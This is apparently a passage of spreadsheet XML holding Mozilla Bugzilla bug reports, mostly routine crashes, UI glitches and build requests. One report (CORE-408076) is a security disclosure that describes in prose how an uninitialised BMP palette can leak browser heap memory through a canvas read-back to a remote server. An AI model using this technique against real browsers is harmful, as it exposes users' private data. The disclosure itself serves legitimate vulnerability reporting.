In previous Seamonkey versions you see that Open was the default action as it is was bold. This has been changed (as there is not default action now) and should be fixed.
Reproducible: Always
Steps to Reproduce:
1. Download file
2. Click with 2nd mouse button
3. Open is not bold</t>
  </si>
  <si>
    <t>THUNDERBIRD-479200</t>
  </si>
  <si>
    <t>Detach a single attachment uses a detach all dialog instead</t>
  </si>
  <si>
    <t>If you select a single attachment and do detach for it using the context menu you get a dialog that is a directory picker and says detach all attachments.
This is because of http://mxr.mozilla.org/comm-central/source/mailnews/base/src/nsMessenger.cpp#2745 wherein the DetachAttachment call delegates its dirty work to DetachAllAttachments passing in an array.  That's no good as people a) would get confused and b) aren't able to pick the file name on disk.
Instead it should likely follow the SaveAs() code path followed by a delete w/ no warning.</t>
  </si>
  <si>
    <t>mueller8</t>
  </si>
  <si>
    <t>CORE-463424</t>
  </si>
  <si>
    <t>Make nsImageDocument/nsPluginDocument participate better in cycle collection</t>
  </si>
  <si>
    <t>Created attachment 346669
v1</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-292319</t>
  </si>
  <si>
    <t>Set trust for XForms events</t>
  </si>
  <si>
    <t>We need to handle the trust issue introduced by bug 289940. There are XXX
comments in:
* nsXFormsDispatchElement.cpp
* nsXFormsUtils.cpp
* nsXFormsTriggerElement.cpp</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-240770</t>
  </si>
  <si>
    <t>spell checker asserts when it has no suggestions</t>
  </si>
  <si>
    <t>spell checker asserts when it has no suggestions
I also think there might be a bug and if there are forgotchar suggestions
we'll make them twice.
I'll attach my a patch.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-43813</t>
  </si>
  <si>
    <t>Whitespace collapsed in flowed paragraphs (format=flowed mails)</t>
  </si>
  <si>
    <t>When I reviewed some code I noticed that the transforming of spaces into  
isn't done in flowed paragraphs. Don't know why but I won't to change that. It 
should be as easy as to remove the check of exdata-&gt;inflow at four places (on 
line 517 533 591 607).</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-206271</t>
  </si>
  <si>
    <t>News Messages being marked as read automatically</t>
  </si>
  <si>
    <t>Windows 98SE Mozilla 2003051808
While reading any group on any news server messages are being marked as read
on the fly automatically without user intervention.
Can't pin down the actual occurence as to what initiates this behaviour but it
seems to happen when mailcheck is taking place. Disk activity proceeds and I can
watch messages being marked as READ on the fly. Also only current messages
downloaded today are affected.</t>
  </si>
  <si>
    <t>TOOLKIT-390746</t>
  </si>
  <si>
    <t>Software Update displays AUS: Update XML File Malformed (200) if system clock is off</t>
  </si>
  <si>
    <t>Software Update displays AUS: Update XML File Malformed (200) if system clock is off.
cbeard has a laptop that is stuck on 1.5.0.8.  When he attempts to update he gets the AUS: Update XML File Malformed (200) message.
note I believe fx 2.x and trunk would have the same bug.
this error is our catch all error message for onError() see
http://lxr.mozilla.org/mozilla1.8/source/toolkit/mozapps/update/src/nsUpdateService.js.in#2009
what's going on is since his system clock is off the https request fails.  (If I try the same request manually I get the a prompt see screen shot #1).
we have a lot of people stuck on old releases.  But my instinct is that not all of them have bad system clocks.
todo items:
1)  propogate the onError() value into the UI and into the console log for better diagnosis.  Note for the branch we can't change any strings.
2)  present a better error message in this scenario:  for example the adjust your system clock (again see screen shot #1).  AGain for the branch we can't change any strings.
3)  send over an http request header (like If-Modified-Since or perhaps X-Update-Date?) so we can see going forward if people are failing for this reason.  (If we had this header on the AUS side we would know if people asking for a version kept asking because they had bad clock time.  of course this only helps future versions of firefox not existing users.)  In the spin off bug I'll see what morgamic things about abusing the If-Modified-Since header or adding a custom HTTP header.
4)  write a support article for support.mozilla.org about seeing this XML error during update? check your system clock (and make sure you are online see bug #312661
thanks again to cbeard for letting me poke at his laptop.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-391547</t>
  </si>
  <si>
    <t>bullet points outside margins on trunk</t>
  </si>
  <si>
    <t>On the trunk bullet points in the qmo tab appear outside the margin of their boxes. Probably needs something in the divs restyled or maybe the bullets just need to be made invisible.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-744228</t>
  </si>
  <si>
    <t>request for access to db-zlb-rw.stage.addons.phx1.mozilla.com</t>
  </si>
  <si>
    <t>Hi. I'm trying to get mysql access to the db for marketplace-dev.allizom.org. Sheeri set me up with an account in bug 743873
what's the best way to access the host? I was hoping to access it from cm-vpn01 like so:
mysql -u kmcmillan -p -h db-zlb-rw.stage.addons.phx1.mozilla.com addons_dev_allizom_org
but I can't ping that host.
Alternatively I could ssh into a safer machine to access it. If that's the case let me know the preferred machine and I will request an account there.</t>
  </si>
  <si>
    <t>cransom</t>
  </si>
  <si>
    <t>kumar.mcmillan</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-235117</t>
  </si>
  <si>
    <t>kat5kaos.com - form submit results in 'location is not a registered protocol' error along with blank page result</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6a) Gecko/20031030
At the example URL try to log in (any made up info is fine just get the captcha
numbers correct).  I get a blank page () along with a
popup dialog that tells me 'location is not a registered protocol'.  I cannot
find anything on the form that might produce this error so I am at a loss as to
how to even begin to fix it on the site.  My only guess is that maybe somehow
Mozilla is mistakenly implementing some sort of protocol guessing (like using
ftp:// for ftp.foo.com) here.
Reproducible: Always
Steps to Reproduce:
1. Visit www.kat5kaos.com
2. Fill out login form
3. Submit
Actual Results:  
Blank page popup error dialog.
Expected Results:  
Proper form submission log into site (or site provided error page for wrong
login info)</t>
  </si>
  <si>
    <t>sparr0</t>
  </si>
  <si>
    <t>SEAMONKEY-277625</t>
  </si>
  <si>
    <t>Context menu Copy Email Address not unescaping</t>
  </si>
  <si>
    <t>Build id: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a6) Gecko/20050108
bug 160055 fixed the context menu Copy Email Address to unescape %40 to @ but
something has regressed it. My limited supply of regression testing builds says
that in Firefox's branch builds (with the same code copied over in bug 215993)
it regressed sometime between 20041010 and 20041017 where to my uneducated eye
bug 263462 seems most likely.
STR:
1. Open attachment 93238
2. Right-click Copy Email Address
3. Paste into text editor observe %40 rather than @</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-501767</t>
  </si>
  <si>
    <t>Need a license for Visual C++ Pro 2008</t>
  </si>
  <si>
    <t>I would like a license for Visual c++ Pro 2008 the x64 version.</t>
  </si>
  <si>
    <t>CORE-54003</t>
  </si>
  <si>
    <t>text controls do not appear in viewer</t>
  </si>
  <si>
    <t>If I do a clobber build and then run viewer first without running mozilla text 
control do not appear. I will try to do some more debugging on this.</t>
  </si>
  <si>
    <t>CALENDAR-135779</t>
  </si>
  <si>
    <t>Calendar builds should have a build ID</t>
  </si>
  <si>
    <t>Take a look at the Apr. 4 xpi File-&gt;About says it was made on Apr. 3. That's
obviously wrong. So what's needed is a way to come up with a build ID when the
xpi is being thrown together.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-310772</t>
  </si>
  <si>
    <t>Update version number for l10n branch build repackaging</t>
  </si>
  <si>
    <t>The l10n branch builds for Firefox and Thunderbird on all platforms are
currently repackaged from en-US 1.4 builds instead of using the latest
1.4.1 builds.
From the latest Linux Firefox build log:
wget --non-verbose --output-document
/builds/tinderbox/Fx-Mozilla1.8-l10n/Linux_2.4.20-28.8_Clobber/firefox.tar.gz
http://stage.mozilla.org/pub/mozilla.org/firefox/nightly/latest-mozilla1.8/firefox-1.4.en-US.linux-i686.tar.gz</t>
  </si>
  <si>
    <t>u60234</t>
  </si>
  <si>
    <t>MOZILLA.ORG-390347</t>
  </si>
  <si>
    <t xml:space="preserve">SVN Account Request - Alex Polvi </t>
  </si>
  <si>
    <t>I used to have authorization to pull/commit to www.mozilla.com module. May I have that activated again?
Thanks!</t>
  </si>
  <si>
    <t>FIREFOX-351551</t>
  </si>
  <si>
    <t>[SessionStore] When sessionstore.js is write-locked a new file is created every 10 or so seconds</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Write-lock sessionstore.js (e.g. by making it read only)
2. Browse for several 10s of seconds
Actual result:
First the file sessionstore.js.moztmp is created (inheriting the read only attribute while sessionstore.js loses it) and then subsequentially sessionstore-1.js sessionstore-2.js etc.
Additionally for every sessionstore-#.js file there's the following error in the console:
Error: Component returned failure code: 0x80520008 (NS_ERROR_FILE_ALREADY_EXISTS) [nsISafeOutputStream.finish]
Source file: file:///C:/PROGRA~1/MOZILL~2/components/nsSessionStore.js
Line: 1988
This sounds like an issue with nsISafeOutputStream (please DUPE if so) but seems not to be a purely theoretical issue (see the linked URL).</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-397834</t>
  </si>
  <si>
    <t>Clean up gfx and gfx/src makefiles</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a9pre) Gecko/2007092605 Firefox/3.0a8pre
Build Identifier: 
1) Removing old GFX checks to another lines.
2) Removing old platform gfx checks except Photon.
3) Removing imgScaler.cpp and nsRegionPool.cpp. 
4) remove mac checks.  
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-366029</t>
  </si>
  <si>
    <t>xsl:copy doesn't instantiate its content as a template for children</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061218 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20061218 Minefield/3.0a1
exslt:node-set is now recognized. Good.
However the transformation result with my XSLT code isn't quite as expected so there probably is a minor problem left.
Reproducible: Always
Steps to Reproduce:
Open above URL and check the end of the transformation result.
Actual Results:  
IETF copyright statements not formatted properly.
Expected Results:  
As per  produced by Saxon 6.5.x.</t>
  </si>
  <si>
    <t>julian.reschke</t>
  </si>
  <si>
    <t>THUNDERBIRD-499543</t>
  </si>
  <si>
    <t>Message header and attachment box can display on top of the statusbar</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X 10_5_7 de-de) AppleWebKit/530.18 (KHTML like Gecko) Version/4.0.1 Safari/530.18
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1pre) Gecko/20090620 Shredder/3.0b3pre
When you read an email in the message pane and drag the splitter down than you can also see the description of the message header in the application border. This only happens for the message header not for the main text of the email.
Reproducible: Always
Steps to Reproduce:
1. Select an email to see it in the message pane
2. Drag the splitter down</t>
  </si>
  <si>
    <t>Nomis101</t>
  </si>
  <si>
    <t>NSPR-77197</t>
  </si>
  <si>
    <t>fork &amp; exec does not work in Neutrino</t>
  </si>
  <si>
    <t>Neutrino does not support fork in threaded applications</t>
  </si>
  <si>
    <t>CORE-606700</t>
  </si>
  <si>
    <t>DOM: IndexedDB</t>
  </si>
  <si>
    <t>IndexedDB: Remove IDBDatabase.description</t>
  </si>
  <si>
    <t>Created attachment 485522
Patch
It has been removed from the spec.</t>
  </si>
  <si>
    <t>THUNDERBIRD-373403</t>
  </si>
  <si>
    <t>Bogus Vista Keys from 1.5.0.10 Shim Need Cleaned Up When Installing Thunderbird</t>
  </si>
  <si>
    <t>Marcia gets a gold star for catching this one. I wish I listened to her a little more closely when she pointed it out to me last week.
1) Clean Vista Install
2) Install 1.5.0.10.
3) Note that the 1.5.0.10 shim provided by Microsoft appears to be writing out the following Vista Keys:
Key: HKLM \ Software  \ RegisteredApplications 
Name: Mozilla Thunderbird
Value: Software\Clients\Mail\Mozilla Thunderbird\Capabilities
It also writes out the following Capabilities keys for Clients\Mail\Mozilla Thunderbird:
Startmenu 
URLAssociations
  mailto Mozilla Thunderbird.Url.mailto
This is particularly bad because Thunderbird 2 uses 'Thunderbird' not 'Mozilla Thunderbird' for the name of the key we write to RegisteredApplications. As a result the user will see Thunderbird listed twice in Default Programs.
Neither Rob nor I have any idea why the shim is generating these keys it certainly doesn't for Firefox.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-467289</t>
  </si>
  <si>
    <t>Favicon for file://localhost/ isn't scaled down</t>
  </si>
  <si>
    <t>From the forums:
http://forums.mozillazine.org/viewtopic.php?f=12&amp;t=972715
file://localhost/ uses the volume icon as the favicon but it uses the 32x32 version without scaling it down.</t>
  </si>
  <si>
    <t>BUGZILLA-394933</t>
  </si>
  <si>
    <t>â€œneworchangedâ€ of bugmail could be localizable more easily</t>
  </si>
  <si>
    <t>Created attachment 279649
Patch
The bugmail template template/en/default/email/newchangedmail.txt.tmpl gets passed the string 'New: ' from BugMail.pm. This would be easier to localize if the string was part of the template.</t>
  </si>
  <si>
    <t>THUNDERBIRD-209792</t>
  </si>
  <si>
    <t>crashes when manual moving messages to junk folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Mozilla Thunderbird 0.1a (20030616)
I will have 19 messages that are marked as junkmail that have not been moved 
to my junk folder.  When I attempt to move those messages by selecting them 
and then clicking-n-draging them over to the junk folder Thunderbird will 
crash.  Then a Microsoft error reporting screen comes up and ask me to report 
the problem to Microsoft.  I grabbed the debug information that it spit out 
and will attach it to this bug
Reproducible: Always
Steps to Reproduce:
1.open thunderbird
2.mark junk messages as junkmail
3.create junk folder
4.select &gt;= 19 junkmail messages
5.drag-n-drop them in the junk folder that was created
6.thunderbird crasses
Actual Results:  
A report this bug to Microsoft window comes up.
Expected Results:  
Letme drag my messages over.
Debug information is attached.</t>
  </si>
  <si>
    <t>treese</t>
  </si>
  <si>
    <t>CALENDAR-306148</t>
  </si>
  <si>
    <t>create new events with floating datetime</t>
  </si>
  <si>
    <t>There are a few bugs that have to do with timezones like wrong recurrance
calculations. I think we can work around those bugs by storing datetimes in
floating timezone instead of utc. That is what 0.2 did and that mostly worked.
If we can get most recurrance and views to work we can try to ship a release
without having to switch to new views which would delay the release even more.
(note: this won't fix the bugs i mentioned it will only work around them. we
should store proper timezone information one day)
example bugs: bug 303826 bug 304084.</t>
  </si>
  <si>
    <t>CALENDAR-412917</t>
  </si>
  <si>
    <t>Calendar Views</t>
  </si>
  <si>
    <t>Task List Headings should display a Tooltip while mouse over</t>
  </si>
  <si>
    <t>Momentarily it is hard to identify the title of a column if the column width is below 30px (WinXP). Displaying a Tooltip would help to identify the column name faster. The tooltip wording should align with the TB wording. For example Click to sort by title</t>
  </si>
  <si>
    <t>richard.marti</t>
  </si>
  <si>
    <t>chris.j.bugzilla</t>
  </si>
  <si>
    <t>CORE-390417</t>
  </si>
  <si>
    <t>Crash [@  gfxSkipCharsIterator::SetOffsets ] with div:first-line {} many lines of text and empty line at end</t>
  </si>
  <si>
    <t>Crashing on gfxSkipChars.cpp:129 which is:
    PRInt32 currentRunLength = mSkipChars-&gt;mList[mListPrefixLength]
In my current instance mListPrefixLength is 3260547140 which makes me think it's coming from uninitialized memory or something.
I also get a few of these assertions before the crash:
 ###!!! ASSERTION: Invalid offset: 'aOffset mCharCount' file /scratch/work/builds/trunk.07-07-31.09-38/mozilla/gfx/thebes/src/gfxSkipChars.cpp line 92
Also if there's enough text to create a vertical scrollbar the crash doesn't happen. 
Right now it looks like I only get a crash when there's 5+ lines of text... but that could just be circumstantial.
Also if I make my browser window wide enough before triggering the test case I don't get the crash (presumably because there are fewer lines)
Found this crash while modifying testcases for bug 387512</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-187642</t>
  </si>
  <si>
    <t>address autocompletion should use displayName when constructing an address</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.2.1) Gecko/20021130
The address book correctly shows displayName when browsing LDAP people 
but the compose window incorrecly uses the cn even when displayName exists: 
William Jefferson Clinton 
should be...
Bill Clinton 
Reproducible: Always
Steps to Reproduce:
1.create a person in ldap that has an extraneous cn but a terse displayName
2.make sure this person has something entered for the mail attribute
3.configure mozilla to use the ldap server to address autocompletion
4.see that the mozilla constructs the address using the extraneous cn
Actual Results:  
Mozilla uses the wrong attribute to construct the email address
Expected Results:  
use the displayName instead of the cn when displayName exists
# From: inetorgperson.schema
#
# When displaying an entry especially within a one-line summary list it
# is useful to be able to identify a name to be used.  Since other attri-
# bute types such as 'cn' are multivalued an additional attribute type is
# needed.  Display name is defined for this purpose.
Given that the 'person' objectclass requires cn and sn it is conventional
and reasonable to use a person's complete/legal name as the unique element 
of the dn. At the same time changing the dn should be avoided. Fortunately
the displayName has been created to allow each users to choose the name that
is displayed for others to see.</t>
  </si>
  <si>
    <t>woodie</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-519246</t>
  </si>
  <si>
    <t>Autosave name for Certificates Exceptions table is cookie_exceptions</t>
  </si>
  <si>
    <t>When the table view is selected in the Exceptions sheet in the Security prefs you can see that the autosave name is cookie_exceptions instead of certificate_exceptions (the panel itself has an autosave name of certifcate_overrides none of the other panels seem to have autosave names).</t>
  </si>
  <si>
    <t>CORE-510428</t>
  </si>
  <si>
    <t>64-bit fixes for nsCocoaUtils and nsCocoaWindow</t>
  </si>
  <si>
    <t>Created attachment 394456
fix v1.0
We need 64-bit fixes for nsCocoaUtils and nsCocoaWindow.</t>
  </si>
  <si>
    <t>CORE-500784</t>
  </si>
  <si>
    <t>Video/audio files over 2^31 bytes in length are unseekable</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.9.1) Gecko/20090624 Firefox/3.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 (x86_64) en-US rv:1.9.1) Gecko/20090624 Firefox/3.5
Files over 2^31 bytes get interpenetrated as having invalid content lengths and thus seeking does not work.
(long files also have a separate issue with the default controls see bug 500764)
Server sends a correct content-length etc.
For example:
http://myrandomnode.dyndns.org:8080/~gmaxwell/firefox/bach.test.ogg
Reproducible: Always</t>
  </si>
  <si>
    <t>abhishekbh</t>
  </si>
  <si>
    <t>gmaxwell</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-338396</t>
  </si>
  <si>
    <t>breadcrumbs fetching wrong title</t>
  </si>
  <si>
    <t>On pages which do not have Title-override (and never have) we are fetching the wrong output.
I found two of these pages so far and fear this may be a much more widespread issue than just these two.
http://developer.mozilla.org/en/docs/CSS3_Columns
http://developer.mozilla.org/en/docs/Issues_Arising_From_Arbitrary-Element_hover</t>
  </si>
  <si>
    <t>CORE-365189</t>
  </si>
  <si>
    <t>document.width/document.height flush layout too late</t>
  </si>
  <si>
    <t>Testcase coming up the issue is caused by the presshell being retrieved before the layout is flushed.
(Bug discovered through code inspection I haven't seen anyone try this.)</t>
  </si>
  <si>
    <t>CORE-408076</t>
  </si>
  <si>
    <t>out of bounds read in BMP decoder can lead to information disclosure</t>
  </si>
  <si>
    <t>Full credit goes to Michael Skladnikiewicz who reported this to security@mozilla.org in an email with subject Mozilla Firefox 2.0.0.11 3.0b2pre and prior Remote Information Disclosure. His initial email is quoted below.
-------------------------------------------
Hi
(credit: Gynvael Coldwind // Vexillium with help from udevd and porneL
(I didn't know about  D))
OK Here is how it goes.
Firefox has a problem in handling 8bit BMP files.
The BMP format has a field in the BITMAPINFOHEADER named biClrUsed the
field says how many colors does the palette contain. If this field is 0
then 256 color pallet is used. When this field is not 0 the palette has
the given number of colors.
Now this is how it goes in Firefox:
1. Firefox allocates 256 * sizeof(RGB) for the palette
2. It copies the biClrUsed colors from the BMP file
Well what is missing is:
1a. memset(pallete 0 256 * sizeof(RGB)
The palette still contains old data from the heap.
Now we take a BMP file sized 256x1x8 with biClrUser = 0 and fill the
bitmap with gradient from 0 to 255:
00 01 02 03 04 05 ... and so on
When displayed the BMP file looks chaotic and in fact it contains the
palette copied to the screen.
Here is where HTML 5.0 comes in and . You can imagine the
rest... But I'll write it anyway. You can create a HTML/javascript that
copies the image from img to a canvas and then gets it data and for
example using a form posts it to some remote server.
This has been tested and it works. There is a PoC exploit in the bottom.
The harvested data contains mainly trash but there are also parts of
other websites parts of java scripts even parts of favorites. Well if
there are also cookies and passwords in heap then they are also reachable.
I've attached also the scripts and the leak.bmp bitmap.
This will be posted on bugtraq as soon as a fixed version of FireFox is
released.
Please check also Thunderbird for this issue (I didn't check).
Best regards
Looking forward to Your reply
Michael Gynvael Coldwind Skladnikiewicz
Team Vexillium
Hispasec</t>
  </si>
  <si>
    <t>CORE-564094</t>
  </si>
  <si>
    <t>more dslots encapsulation</t>
  </si>
  <si>
    <t>Created attachment 443787
patch
Draft patch requiring feedback for further progress:
- js_FunctionClass doesn't have any JSSLOT_* values which is odd
  because it has JSCLASS_IS_PRIVATE|JSCLASS_HAS_RESERVED_SLOTS(2).  Is this
  an XPConnect thing?  I see this comment:
    /*
     * Reserve two slots in all function objects for XPConnect.  Note that
     * this does not bloat every instance only those on which reserved slots
     * are set and those on which ad-hoc properties are defined.
     */ 
    JS_FRIEND_DATA(JSClass) js_FunctionClass = { 
- The following function names are based on the equivalent functions for
  Arrays.  Better names should be used but I don't know what they are because
  I'm still not sure what the dslots hold for Function and Call objects.
  getFunctionCapacity()
  addressOfFunctionElement()
  setFunctionElement()
  getFunctionElements() // are the elements upvars?  what are upvars?
  getCallCapacity()
  getCallElements()     // getCallArgsAndVars()?
- For js_ArgumentsClass we have getters/setters with names like
  getArgsLength().  I wonder if that should become getArgumentsLength().  The
  rationale would be that we use the full Arguments when talking about the
  Arguments object (eg. getCallArguments()) and the shorter Args for
  non-Arguments arguments (eg. getCallArgsAndVars() if we go with that name).</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-836264</t>
  </si>
  <si>
    <t>Gaia::Calendar</t>
  </si>
  <si>
    <t>[Calendar UX VD] Event detail: Delete event button should be separated by a horizontal divider and text centered</t>
  </si>
  <si>
    <t>Created attachment 708096
COmparison between actual implementation and original design
DElete event button should be separated and text centerd int the button in order to be consistent with the rest of the OS. 
Check attachment for clarification.</t>
  </si>
  <si>
    <t>vicky.bugzilla</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-426214</t>
  </si>
  <si>
    <t>Automatically update blocklist.xml in cvs/hg from blocklist service</t>
  </si>
  <si>
    <t>Now that the blocklsit is being shipped with builds we should automatically update the version in CVS periodically so we are shipping a recent copy. Apparently this can be done similarly to how autoconf is run on configure.in.
The blocklist file in cvs is at browser/app/blocklist.xml.
The latest blocklist can always be pulled from https://addons.mozilla.org/blocklist/1/{ec8030f7-c20a-464f-9b0e-13a3a9e97384}/3.0/ (the actual version string shouldn't matter but a version is necessary.
The file is not updated that frequently but I guess at least a daily check would be sensible.</t>
  </si>
  <si>
    <t>CORE-112073</t>
  </si>
  <si>
    <t>crash when moving javascript popups</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.6) Gecko/20011120
BuildID:    2001112012
old clint eastwood movie posters on this page display in javascript popups
after popping one up and moving the popped-up window browser crashes
Reproducible: Always
Steps to Reproduce:
1. go to http://clinteastwood.net/welcome.html
2. click on Posters in the Contents menu on the left
3. click on 1970's in the top menu
4. click any movie poster
5. move the popped-up window
Actual Results:  mozilla crashed
Expected Results:  pop-up moves mozilla doesn't crash</t>
  </si>
  <si>
    <t>joki</t>
  </si>
  <si>
    <t>matthewm</t>
  </si>
  <si>
    <t>SEAMONKEY-808196</t>
  </si>
  <si>
    <t>Update SeaMonkey website for 2.14 Beta 3</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #805972 +++
For making SeaMonkey 2.14 Beta 3 public we'll need to update the website.
ETA for this release is Friday November 2.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-745643</t>
  </si>
  <si>
    <t>[sr] Translate strings for variants of the upgrade dialog for 3.6 users'</t>
  </si>
  <si>
    <t>This is a tracking bug to follow the translation of a few extra strings in upgradedialog.lang that show variants of the unsupported message billboard to 3.x users.
Here are the urls of the billboards:
http://www-dev.allizom.org/b/sr/firefox/unsupported/warning/
http://www-dev.allizom.org/b/sr/firefox/unsupported/EOL/
http://www-dev.allizom.org/b/sr/firefox/unsupported/win2k/
http://www-dev.allizom.org/b/sr/firefox/unsupported/winxp/
You may already have partly or completely translated the strings since several f thel were already translated last year for previous versions of the billboard and the last ones where added last week on your web dashboard as untranslated (but the pages were not built and we didn't have the staging server ready until this week end to check these strings in context in real pages).
If you have already translated the strings just mark this bug as fixed other wise please update your upgradedialog.lang file on mozilla.org:
http://l10n.mozilla-community.org/~pascalc/langchecker/?locale=sr#upgradedialog.lang
source:
https://svn.mozilla.org/projects/mozilla.com/trunk/locales/sr/upgradedialog.lang
Thanks</t>
  </si>
  <si>
    <t>oskar.ivanic</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-257779</t>
  </si>
  <si>
    <t>bbc.co.uk - BBC Radio player buttons do not work. (e.g. &gt;&gt; 5 minutes button on above site)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
If you go to http://www.bbc.co.uk/radio/aod/radio1_aod.shtml?essmix# and press
on either the &gt;&gt; 5 minutes or &gt;&gt; 15 minutes or || pause button nothing
will happen.  These buttons will work if using Internet Explorer.
The same happens with some other sites.  I have had a similar problem while
trying to register with wanadoo
Reproducible: Always
Steps to Reproduce:
1.go to http://www.bbc.co.uk/radio/aod/radio1_aod.shtml?essmix#
2.press on the &gt;&gt; 5 minutes button
3.
Actual Results:  
Nothing
Expected Results:  
either fast forwarded or paused</t>
  </si>
  <si>
    <t>jhirst</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-243887</t>
  </si>
  <si>
    <t>fatandypicks.com - SHTML served as text/plain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040517 Camino/0.8b
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7) Gecko/20040517 Camino/0.8b
Same as summary
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.fatandypicks.com/
2.
3.
Expected Results:  
Displayed images and text.</t>
  </si>
  <si>
    <t>stormy7777</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-294317</t>
  </si>
  <si>
    <t>Many Not implemented functions in native mac menus code return NS_OK</t>
  </si>
  <si>
    <t>CORE-460740</t>
  </si>
  <si>
    <t>[contenteditable][list-item] invalid results when pressing ENTER inside 1. a contenteditable LI or 2. a contenteditable element inside a LI or 3. a contenteditable element inside a block element inside a LI</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
[contenteditable] invalid results when pressing ENTER inside 
1. a contenteditable LI ()
2. a contenteditable element inside a LI ()
3. a contenteditable element inside a block element inside a LI()
Editing should be contained inside the contenteditable element.
Actual results for each case:
1. New contenteditable LI gets created.
2. New contenteditable element gets created.
3. Nothing happens.
Expected results: editing takes place inside the editanle element and:
1. Split selection with a BR.
2. same as 1
3. same as 1
The described expected results are debatable.
Reproducible: Always</t>
  </si>
  <si>
    <t>dpopa</t>
  </si>
  <si>
    <t>CORE-440486</t>
  </si>
  <si>
    <t>The FAX dialog disappear and Fax cannot be done from Firefox but works otherwise</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9) Gecko/2008052906 Firefox/3.0
Hi
On File Print and selecting Fax the dialog box does not bring the fax information dialog box. Other applications including openOffice can do the fax. It started happening after upgrade to Firefox 3.0
Thanks
Raj
Reproducible: Always
Steps to Reproduce:
1.on any webpage go to File manu
2.Select Print
3.Select fax as Printer name
4. Click OK.
The same use to work in earlier release of Firefox and still works in other applications.
Actual Results:  
as above
Expected Results:  
The dialog box should bring the Send Fax Wizard</t>
  </si>
  <si>
    <t>rajeev1a</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-341816</t>
  </si>
  <si>
    <t>Node Type in DOM Inspector doesn't display a string of what it is</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060610 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a1) Gecko/20060610 Minefield/3.0a1
When selecting a node in the DOM Inspector the Node Type: has a number in it.  This corresponds to the node type but it should display the textual representation of it.
Reproducible: Always
Steps to Reproduce:
1. Select a Node in the DOM Inspector
Actual Results:  
A number is displayed (usually a 1)
Expected Results:  
It should have a textual representation of what the node type is.
The inspector.properties file already has all of the node types in it so this should be very trivial.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-218897</t>
  </si>
  <si>
    <t>tinderbox3 login script has a perl parse error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030612
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.4) Gecko/20030612
when clicking on the Login link from the admin.pl script I get the following error:
DBD::Pg::db do failed: ERROR:  parser: parse error at or near ) at character
